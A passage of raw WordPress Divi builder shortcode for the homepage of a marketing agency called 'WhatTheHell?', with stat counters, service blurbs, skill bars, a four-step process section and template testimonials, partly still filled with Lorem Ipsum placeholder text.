the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\" alt=\"creative services\" title_text=\"creative services\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" hover_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" title_text=\"home-office-07-1\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" title_text=\"portraits-circle-small_2\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" 